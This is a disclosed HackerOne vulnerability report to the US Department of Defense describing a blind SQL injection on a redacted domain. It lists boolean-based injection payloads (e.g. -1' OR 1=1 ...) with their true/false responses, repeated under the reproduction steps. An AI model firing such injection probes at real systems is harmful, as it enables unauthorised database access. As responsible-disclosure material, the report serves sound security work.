Blind SQL iNJECTION

Disclosed: 2021-06-03 16:32:38 By 1337n0x To deptofdefense
Medium
Vulnerability Details
Hi DoD Secuirty team , i found Blind SQL Injection in this below domain https://███████ Proof of concept: Vuln URL:https://██████████/██████ Pooc: URL encoded POST input ███ was set to -1' OR 3*2*1=6 AND 1=1 or '4mEwSPwJ'=' Tests performed: -1' OR 1=1 or '4mEwSPwJ'=' => TRUE -1' OR 2=4 or '4mEwSPwJ'=' => FALSE -1' OR 3*2<(1+2+4) or '4mEwSPwJ'=' => TRUE -1' OR 3*2>(1+2+4) or '4mEwSPwJ'=' => FALSE Poc video : ███ ## Impact It gives the attacker access and control over the backend database server ## System Host(s) ██████████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce ..Vuln URL:https://██████/█████ Pooc: URL encoded POST input ███ was set to -1' OR 3*2*1=6 AND 1=1 or '4mEwSPwJ'=' Tests performed: -1' OR 1=1 or '4mEwSPwJ'=' => TRUE -1' OR 2=4 or '4mEwSPwJ'=' => FALSE -1' OR 3*2<(1+2+4) or '4mEwSPwJ'=' => TRUE -1' OR 3*2>(1+2+4) or '4mEwSPwJ'=' => FALSE Poc video : █████ ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1102591
  • State: Closed
  • Substate: resolved
  • Upvotes: 18
Share this report